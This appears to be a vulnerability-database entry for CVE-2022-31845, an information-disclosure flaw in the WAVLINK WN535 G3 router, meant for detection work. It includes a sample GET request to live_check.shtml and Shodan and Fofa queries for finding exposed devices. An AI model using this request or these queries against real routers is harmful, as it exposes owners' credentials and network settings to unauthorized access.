🔙 목록으로 돌아가기

CVE-2022-31845: WAVLINK WN535 G3 - Information Disclosure

TitleWAVLINK WN535 G3 - Information Disclosure
Authorarafatansari
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration.
RemediationApply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
CVSS Score7.5
EPSS Score0.61681
CVE IDCVE-2022-31845
CWE IDCWE-668
Shodan Queryhttp.html:"Wavlink"http.html:"wavlink"http.title:"wi-fi app login"
Fofa Querytitle="wi-fi app login"body="wavlink"
Tags cve cve2022 wavlink exposure vuln

🔍 Vulnerability Description

WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /live_check.shtml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31845.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31845.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A